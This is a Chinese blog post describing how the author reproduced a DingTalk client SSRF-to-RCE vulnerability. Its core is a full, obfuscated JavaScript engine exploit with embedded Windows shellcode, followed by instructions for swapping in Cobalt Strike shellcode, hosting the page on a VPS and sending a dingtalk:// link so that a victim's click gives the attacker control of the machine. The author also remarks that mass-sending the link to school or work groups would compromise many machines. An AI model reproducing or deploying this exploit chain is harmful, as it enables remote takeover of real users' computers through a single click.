钉钉从ssrf到rce

前几天爆出来钉钉 RCE 的漏洞，说一下发现和复现的过程

 

0x01 爱之初体验

最开始是发现可以 SSRF，当时电脑上正好装着钉钉，就顺手试了一下

DNSLog 有回显，说明服务端会去访问链接

 

 

这两个 IP 一查，都是阿里云的服务器

 

 

payload 是这样的，发送到聊天窗口后服务器就会去解析

dingtalk://dingtalkclient/page/link?url=http://....&pc_slide=true

 

0x02 爱之再发现

 

然后奇哥跟我说可以 RCE，找了个 payload 过来

<html>

<body>
    <h1> test </h1>
    <script>
    var _0x1b17=['KELCi8OxLg==','ZE/CpWvCpDkcPA==','E8Kjw51bQ8O+Klk0w4vCsw==','w5lnw5Ipwr12RsOCw7B/J8OEw4E=','QMOtNcO9w77Dv8OIwp3DmQ7CksOdOA==','X8KgbcK0wqXCuw==','DjfCg8KK','OsO3fsOwwojCq0YpMw==','RMKWBMKHW3PCqcKjTwgMaw==','O8KCw5PCoMOpwo0=','e0rDgMO8wqNndsOM','wphVw6Zhw7wWwrLDg8K1','IibCvsKFwqXCqMKAw6w4NDgs','PcO6Z8O2w4LCp20tMWrDhxMZRSLCmSvDuTjCnk8=','GcOiPsKX','G8K7w6vDpXNGIcOwLnXDu8K9BkI=','w7MXFMKhw78WwpYqwqVVFcKR','GMK/w7vDpnVIJ8Or','ank7Wy4jw44=','HTfCicKbGsKEaysJwqTDux1L','GS3CqsKEwqjCp8KRw5Y=','GcOmcktVwrw=','w50aKsKuwq9cdMO4wpTDqyo5GBQ=','IybCrcKgwrvCpsKGw5w8Pyc5AcOn','NhbCuwM=','wqFcbEfDmMOMw6LCkl9ywqwDwocc','wqfChMOfw4jDjsKzwozCn8Oqwok=','w4tcwrED','cCvCsMOQw7g=','w6pdw4k=','wqJyw4vCmMO1wrTCj8OSwqnDnSY=','WsKcBA==','wrV8w4vCjcOlwrDDgcKXwqTDlQ==','XsKWD8KeWA==','H8O+KcKHHGPDiUQ=','w73Ci8OFw60=','Wy7Csg==','e0TDocOvwrR6IsKLQArDsw==','AzvCjQIS','VMOxw6/Ciw==','fEDDp8OdwrhgbMKYGw==','PCzCvg==','w5QHwrPDlGRLNQHDpHwqa8OJR3hiwpwyMBJzJR8=','ZMO8ecOcd8Oow7M6wq1O','w417wqvDl3BuwooiwrnCpDBZwoNw','fHtRGA==','Y24s','w4VWwrsdKQ8=','HsKCOC4RwrQ=','w4AJwrLDi05SLxfDtEI0esODaA==','L2kiFG0=','H8O+I8KdBmc=','w6RcwrEPMQI=','FTvDq8O+w7Ucax4=','FsKfJS4Rwrky','wpBAw5zCjMO1','HsO+w4PDgsKUWw==','EcKxwoXDjcOLCQ==','PkrCncOEOMOww7fCrlDCgMOJesOdAQ==','F8K+w49bSQ==','w4dew5rDmMKg','wp52wrbCpzM=','wqIjw4xDwqA=','cMKIw5vCncKdJV/CoMK7RA==','CiTCnsKdC8KV','fXtHE8ObSBZqwp5G','Fjd1EMOqw57CgcOd','ZsOje8OLbMO8w4Q3wqAQwqU=','C8Kxw63Dh3RZIcO6Pj4=','w4rDj8O/','ZU/Ctg==','BcKyw55TcsO8HF8+w7jCtsKtEgo7w5LCigQ8','w4ZdwrkVPAM='];(function(_0x4285cf,_0x1b1736){var _0x1368bb=function(_0x5a17b5){while(--_0x5a17b5){_0x4285cf['push'](_0x4285cf['shift']());}};_0x1368bb(++_0x1b1736);}(_0x1b17,0x17b));var _0x1368=function(_0x4285cf,_0x1b1736){_0x4285cf=_0x4285cf-0x0;var _0x1368bb=_0x1b17[_0x4285cf];if(_0x1368['kUYGYC']===undefined){(function(){var _0x270725=function(){var 
_0x2929b1;try{_0x2929b1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x1b9f87){_0x2929b1=window;}return _0x2929b1;};var _0x1971fd=_0x270725();var _0x3ad59d='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1971fd['atob']||(_0x1971fd['atob']=function(_0x332690){var _0x352a1c=String(_0x332690)['replace'](/=+$/,'');var _0x194774='';for(var _0x5d479b=0x0,_0xde7a28,_0x1ef172,_0x26c98e=0x0;_0x1ef172=_0x352a1c['charAt'](_0x26c98e++);~_0x1ef172&&(_0xde7a28=_0x5d479b%0x4?_0xde7a28*0x40+_0x1ef172:_0x1ef172,_0x5d479b++%0x4)?_0x194774+=String['fromCharCode'](0xff&_0xde7a28>>(-0x2*_0x5d479b&0x6)):0x0){_0x1ef172=_0x3ad59d['indexOf'](_0x1ef172);}return _0x194774;});}());var _0xa07d5c=function(_0x5c13fe,_0x1ca04c){var _0x48ea63=[],_0x8f6b18=0x0,_0x30c8e4,_0xb17e6='',_0x53b898='';_0x5c13fe=atob(_0x5c13fe);for(var _0x52b8af=0x0,_0x1cd1ff=_0x5c13fe['length'];_0x52b8af<_0x1cd1ff;_0x52b8af++){_0x53b898+='%'+('00'+_0x5c13fe['charCodeAt'](_0x52b8af)['toString'](0x10))['slice'](-0x2);}_0x5c13fe=decodeURIComponent(_0x53b898);var _0x49825d;for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++){_0x48ea63[_0x49825d]=_0x49825d;}for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++){_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d]+_0x1ca04c['charCodeAt'](_0x49825d%_0x1ca04c['length']))%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;}_0x49825d=0x0;_0x8f6b18=0x0;for(var _0x17f739=0x0;_0x17f739<_0x5c13fe['length'];_0x17f739++){_0x49825d=(_0x49825d+0x1)%0x100;_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d])%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;_0xb17e6+=String['fromCharCode'](_0x5c13fe['charCodeAt'](_0x17f739)^_0x48ea63[(_0x48ea63[_0x49825d]+_0x48ea63[_0x8f6b18])%0x100]);}return _0xb17e6;};_0x1368['SGqjCq']=_0xa07d5c;_0x1368['PalevQ']={};_0x1368['kUYGYC']=!![];}var 
_0x5a17b5=_0x1368['PalevQ'][_0x4285cf];if(_0x5a17b5===undefined){if(_0x1368['FXcKZO']===undefined){_0x1368['FXcKZO']=!![];}_0x1368bb=_0x1368['SGqjCq'](_0x1368bb,_0x1b1736);_0x1368['PalevQ'][_0x4285cf]=_0x1368bb;}else{_0x1368bb=_0x5a17b5;}return _0x1368bb;};const max_size=0x2710;const buf=new ArrayBuffer(0x8);const f64=new Float64Array(buf);const u32=new Uint32Array(buf);function f2i(_0x5ba462){f64[0x0]=_0x5ba462;let _0x3b54a5=Array['from'](u32);return _0x3b54a5[0x1]*0x100000000+_0x3b54a5[0x0];}function i2f(_0x2f58b4){let _0x8b3c4c=[];_0x8b3c4c[0x0]=parseInt(_0x2f58b4%0x100000000);_0x8b3c4c[0x1]=parseInt((_0x2f58b4-_0x8b3c4c[0x0])/0x100000000);u32[_0x1368('0x38','XQdw')](_0x8b3c4c);return f64[0x0];}function d2u(_0x9ff56e){f64[0x0]=_0x9ff56e;let _0x47fd50=Array[_0x1368('0xa','7rtu')](u32);return _0x47fd50;}function u2d(_0x535342,_0x2feac9){u32[0x0]=_0x535342;u32[0x1]=_0x2feac9;return f64[0x0];}function print(_0x510c7e){document[_0x1368('0x29','1027')](_0x1368('0x16','pndm')+_0x510c7e+_0x1368('0x19','@XkD'));}function hex(_0x2abe47){return _0x2abe47[_0x1368('0x45','Ob1V')](0x10)[_0x1368('0x3','@XkD')](0x10,'0');}function success_value(_0x140a70,_0x2c5308){console[_0x1368('0x11','THAJ')](_0x1368('0x15','ki5k')+_0x140a70+hex(_0x2c5308));}function wasm_func(){var _0x1ab208={'env':{'puts':function _0x36676a(_0x4b8a69){console[_0x1368('0x1b','*I%3')](_0x4b8a69);}}};var _0x364582=new 
Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x89,0x80,0x80,0x80,0x0,0x2,0x60,0x1,0x7f,0x1,0x7f,0x60,0x0,0x0,0x2,0x8c,0x80,0x80,0x80,0x0,0x1,0x3,0x65,0x6e,0x76,0x4,0x70,0x75,0x74,0x73,0x0,0x0,0x3,0x82,0x80,0x80,0x80,0x0,0x1,0x1,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x92,0x80,0x80,0x80,0x0,0x2,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x5,0x68,0x65,0x6c,0x6c,0x6f,0x0,0x1,0xa,0x8d,0x80,0x80,0x80,0x0,0x1,0x87,0x80,0x80,0x80,0x0,0x0,0x41,0x10,0x10,0x0,0x1a,0xb,0xb,0x92,0x80,0x80,0x80,0x0,0x1,0x0,0x41,0x10,0xb,0xc,0x48,0x65,0x6c,0x6c,0x6f,0x20,0x57,0x6f,0x72,0x6c,0x64,0x0]);let _0x17d97a=new WebAssembly[(_0x1368('0x6','*I%3'))](new WebAssembly[(_0x1368('0x26','h0rH'))](_0x364582),_0x1ab208);let _0x4137b4=new Uint8Array(_0x17d97a[_0x1368('0x28','U7m4')][_0x1368('0x22','U7m4')][_0x1368('0x2a','CQJJ')]);return _0x17d97a[_0x1368('0x4','qxzt')][_0x1368('0x13','THAJ')];}func=wasm_func();function gc(){for(let _0x636073=0x0;_0x636073<0x10;_0x636073++){new Array(0x1000000);}}function debug(){for(let _0x1aae5c=0x0;_0x1aae5c<0x10000;_0x1aae5c++){for(let _0x206767=0x0;_0x206767<0x20000;_0x206767++){var _0x4e0be5=_0x4e0be5+_0x1aae5c+_0x206767;}}}global_object={};setPropertyViaEmbed=(_0x704953,_0xabb024,_0x54136d)=>{const _0x57fb88=document[_0x1368('0x5','qlp^')](_0x1368('0x3b','e8CW'));_0x57fb88[_0x1368('0x3a','h0rH')]=_0x54136d;_0x57fb88['type']=_0x1368('0x46','E5A6');Object['setPrototypeOf'](global_object,_0x57fb88);document[_0x1368('0x1f','4nv[')][_0x1368('0x35','ow9l')](_0x57fb88);_0x704953[_0x1368('0x23','p]KF')]=_0xabb024;_0x57fb88[_0x1368('0x25','QvKY')]();};createCorruptedPair=(_0x16735d,_0x65366a)=>{const _0x5a7565={'__proto__':global_object};_0x5a7565[_0x1368('0x47','*I%3')]=0x1;setPropertyViaEmbed(_0x5a7565,_0x65366a,()=>{Object[_0x1368('0x2c','e8CW')](global_object,null);_0x5a7565[_0x1368('0x8','Ub)S')]=_0x16735d;});const 
_0x2dc8d4={'__proto__':global_object};_0x2dc8d4[_0x1368('0x43','THAJ')]=0x1;setPropertyViaEmbed(_0x2dc8d4,_0x65366a,()=>{Object[_0x1368('0x1','@XkD')](global_object,null);_0x2dc8d4[_0x1368('0xb','*j!$')]=_0x16735d;_0x5a7565[_0x1368('0x2','5I39')]=1.1;});return[_0x5a7565,_0x2dc8d4];};const array=[5.5,1.1];array['prop']=0x1;const test1=new BigUint64Array(0x2);var oob_array=[1.1,2.2,3.3];obj_array={'m':0x539,'target':gc};ab=new ArrayBuffer(0x1337);gc();gc();gc();var test=[oob_array,oob_array,oob_array,oob_array,oob_array];test[_0x1368('0x41','qlp^')]=0x1;const [object_1,object_2]=createCorruptedPair(array,test);jit=(_0x166e60,_0x539576,_0x1ae253)=>{return _0x166e60['corrupted_prop'][_0x539576];};for(var i=0x0;i<0x10000;++i)jit(object_1,0x0);var leak=jit(object_2,0x0);elem=d2u(leak)[0x0];print('0x'+hex(elem));const num=u2d(elem+0x4,elem+0x4);const num2=u2d(elem,elem);proto2={};setPropertyViaEmbed2=(_0x3c4ce8,_0x5b3f78,_0x570b6e)=>{const _0x1411bc=document[_0x1368('0x3e','NbDf')](_0x1368('0x2d','54b8'));_0x1411bc[_0x1368('0x44','MqJl')]=_0x570b6e;_0x1411bc[_0x1368('0x0','QvKY')]=_0x1368('0x42','Xp#V');Object[_0x1368('0x1e','djTM')](proto2,_0x1411bc);document[_0x1368('0xd','h0rH')][_0x1368('0x3d','54b8')](_0x1411bc);_0x3c4ce8[_0x1368('0x33','4nv[')]=_0x5b3f78;_0x1411bc['remove']();};createCorruptedPair2=(_0x31208b,_0x4b08b5)=>{const _0x2fdefd={'__proto__':proto2};_0x2fdefd[_0x1368('0x27','pndm')]=0x1;setPropertyViaEmbed2(_0x2fdefd,_0x4b08b5,()=>{Object['setPrototypeOf'](proto2,null);_0x2fdefd[_0x1368('0x36','@XkD')]=_0x31208b;});const _0x5a6d27={'__proto__':proto2};_0x5a6d27[_0x1368('0x3c','XQdw')]=0x1;setPropertyViaEmbed2(_0x5a6d27,_0x4b08b5,()=>{Object[_0x1368('0x9','*I%3')](proto2,null);_0x5a6d27[_0x1368('0xc','eHuP')]=_0x31208b;_0x2fdefd[_0x1368('0x14','QvKY')]=1.1;});return[_0x2fdefd,_0x5a6d27];};const 
[object_3,object_4]=createCorruptedPair2(array,num2);jit22=(_0x15b278,_0x32c377)=>{_0x15b278[_0x1368('0x31','*clI')][_0x32c377]=num2;_0x15b278[_0x1368('0x12','1#r2')][_0x32c377+0x1]=1.1;return _0x15b278[_0x1368('0x1d','ow9l')][_0x32c377];};for(var i=0x0;i<0x100000;++i)jit22(object_3,0x0);var leak2=jit22(object_4,0x0);var object_idx=undefined;var object_idx_flag=undefined;for(let i=0x0;i<max_size;i++){if(d2u(oob_array[i])[0x0]==0xa72){print(_0x1368('0x2b','CQJJ')+i+_0x1368('0x18','O6t]'));print('target:\x20i:\x20'+i+'\x20hi\x201');object_idx=i;object_idx_flag=0x1;break;}if(d2u(oob_array[i])[0x1]==0xa72){print(_0x1368('0x7','3nrn')+i+_0x1368('0x2f','djTM'));print('target:\x20i:\x20'+(i+0x1)+_0x1368('0x18','O6t]'));object_idx=i+0x1;object_idx_flag=0x0;break;}}function addrof(_0x71fee0){obj_array[_0x1368('0x32','qlp^')]=_0x71fee0;return d2u(oob_array[object_idx])[object_idx_flag]-0x1;}var ab_addr=addrof(ab);print('test:\x20'+hex(ab_addr));var bk_idx=undefined;var bk_idx_flag=undefined;let flag=0x0;for(let i=0x0;i<max_size;i++){if(d2u(oob_array[i])[0x0]==0x1337){console[_0x1368('0x20','qxzt')](_0x1368('0x40','M*(X')+i+_0x1368('0x2e','1027'));console[_0x1368('0x37','ki5k')](_0x1368('0x17','Ob1V')+i+_0x1368('0xe','*I%3'));bk_idx=i;bk_idx_flag=0x1;break;}if(d2u(oob_array[i])[0x1]==0x1337){console['log']('m:\x20i:\x20'+i+_0x1368('0x24','qxzt'));console[_0x1368('0xf','0$K8')](_0x1368('0x10','1#r2')+(i+0x1)+_0x1368('0x30','roPh'));bk_idx=i+0x1;bk_idx_flag=0x0;break;}}var dv=new DataView(ab);var bk_addr=d2u(oob_array[bk_idx]);function get_32(_0x251c0e){var _0x524bc3=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x251c0e,_0x524bc3[0x1]);}else{oob_array[bk_idx]=u2d(_0x524bc3[0x0],_0x251c0e);}return dv['getUint32'](0x0,!![]);}function set_32(_0x2f8305,_0x1a3c26){var 
_0xd022f7=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x2f8305,_0xd022f7[0x1]);}else{oob_array[bk_idx]=u2d(_0xd022f7[0x0],_0x2f8305);}dv[_0x1368('0x1a','Ob1V')](0x0,_0x1a3c26,!![]);}function set_8(_0x5d0cd7,_0x575a5c){var _0x50493b=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x5d0cd7,_0x50493b[0x1]);}else{oob_array[bk_idx]=u2d(_0x50493b[0x0],_0x5d0cd7);}dv[_0x1368('0x34','tZnn')](0x0,_0x575a5c,!![]);}var wasm_func_addr=addrof(func);print(_0x1368('0x39','54b8')+hex(wasm_func_addr));var shared_info_addr=get_32(wasm_func_addr+0xc)-0x1;print(_0x1368('0x48','Xp#V')+hex(shared_info_addr));var export_function_data_addr=get_32(shared_info_addr+0x4)-0x1;print('export_function_data_addr\x20is:\x20'+hex(export_function_data_addr));var wasm_instance_addr=get_32(export_function_data_addr+0x8)-0x1;print(_0x1368('0x1c','p]KF')+hex(wasm_instance_addr));var rwx_addr=get_32(wasm_instance_addr+0x40);print(_0x1368('0x3f','M*(X')+hex(rwx_addr));var shellcode=new Uint8Array([0x89,0xe5,0x83,0xec,0x20,0x31,0xdb,0x64,0x8b,0x5b,0x30,0x8b,0x5b,0xc,0x8b,0x5b,0x1c,0x8b,0x1b,0x8b,0x1b,0x8b,0x43,0x8,0x89,0x45,0xfc,0x8b,0x58,0x3c,0x1,0xc3,0x8b,0x5b,0x78,0x1,0xc3,0x8b,0x7b,0x20,0x1,0xc7,0x89,0x7d,0xf8,0x8b,0x4b,0x24,0x1,0xc1,0x89,0x4d,0xf4,0x8b,0x53,0x1c,0x1,0xc2,0x89,0x55,0xf0,0x8b,0x53,0x14,0x89,0x55,0xec,0xeb,0x32,0x31,0xc0,0x8b,0x55,0xec,0x8b,0x7d,0xf8,0x8b,0x75,0x18,0x31,0xc9,0xfc,0x8b,0x3c,0x87,0x3,0x7d,0xfc,0x66,0x83,0xc1,0x8,0xf3,0xa6,0x74,0x5,0x40,0x39,0xd0,0x72,0xe4,0x8b,0x4d,0xf4,0x8b,0x55,0xf0,0x66,0x8b,0x4,0x41,0x8b,0x4,0x82,0x3,0x45,0xfc,0xc3,0xba,0x78,0x78,0x65,0x63,0xc1,0xea,0x8,0x52,0x68,0x57,0x69,0x6e,0x45,0x89,0x65,0x18,0xe8,0xb8,0xff,0xff,0xff,0x31,0xc9,0x51,0x68,0x2e,0x65,0x78,0x65,0x68,0x63,0x61,0x6c,0x63,0x89,0xe3,0x41,0x51,0x53,0xff,0xd0,0x31,0xc9,0xb9,0x1,0x65,0x73,0x73,0xc1,0xe9,0x8,0x51,0x68,0x50,0x72,0x6f,0x63,0x68,0x45,0x78,0x69,0x74,0x89,0x65,0x18,0xe8,0x87,0xff,0xff,0xff,0x31,0xd2,0x52,0xff,0xd0]);for(let 
i=0x0;i<shellcode[_0x1368('0x21','h0rH')];i++)set_8(rwx_addr+i,shellcode[i]);func();
</script>
</body>

 

 

代码的原理不是很懂，太菜了，只知道把其中的 shellcode 换成 CS 生成的木马就可以上线了。

 

 

简单记录下上线过程:

首先在 VPS 上启动 CS，这里的命令是

 ./teamserver IP passwd

 

然后登上 CS，生成 shellcode

 

 

 

 

 

 

生成 C 文件后，按照给的 payload 的格式，我们要把 \x 形式的 16 进制替换成 0x 形式

因为这里给的 shellcode 就是 0x 格式

\x 连起来表示的是一个字符串，而 0x 单个表示的是一个整型数字

比如 0x42 这个 16 进制数对应十进制 66，而 \x42 对应的是 ASCII 码 66，即字符 B

当然 ASCII 只到 0~127，再往上就没有了，所以 \x7f 对应的 127 正好是上限

 

 

 

 

 

 

 

所以格式上：0x 形式之间要用逗号 ',' 分隔，而 \x 形式直接连接

 

 

 

替换一下就行

 

 

 

然后把改好的shellcode 替换到payload上面

 

 

 

 

 

接下来在 VPS 上用 python3 简单起一个 web 服务，用的是 9127 端口

python3 -m http.server 9127

 

下面的是访问日志

 

 

 

 

 

然后把构造好的页面拼成 http 链接

dingtalk://dingtalkclient/page/link?url=http://IP:PORT/jjj.html&pc_slide=true

 

然后这里自己点击链接试一下

 

 

 

 

 

结果啥也没有，cao！！后面重写了好几次 shellcode，换成弹计算器也不行，

最后发现我用的是 6.3.15 版本，这个版本好像是不行的：虽然 SSRF 能在 DNSLog 上看到回显，但是不能 RCE

 

 

然后换成了6.3.5版本

 

 

 

最后终于成功上线了，可以看到上线的进程是由钉钉拉起的

 

 

 

 

 

 

0x03 爱后再总结

 

这种类型的rce危害确实大,如果用的是6.3.5版本的钉钉,那么发送这个链接,只要别人点击就会上线。

群发到学校群或者工作群直接批量上线,危害极大。

所以今天早上我打开钉钉，它已经自动给我从 15 更新到了 25 版本，而且我之前都不知道！！

这个漏洞的利用方式和去年护网期间爆出的 Google Chrome 那个 0day 很类似，

可以看看朋友的博客有验证过程

 

漏洞验证或者利用时，一定要先注意版本适用的问题，这次就因为这个被搞了半天。

 

给一个RCE的视频链接

 

posted @ 2022-02-17 10:18  Erichas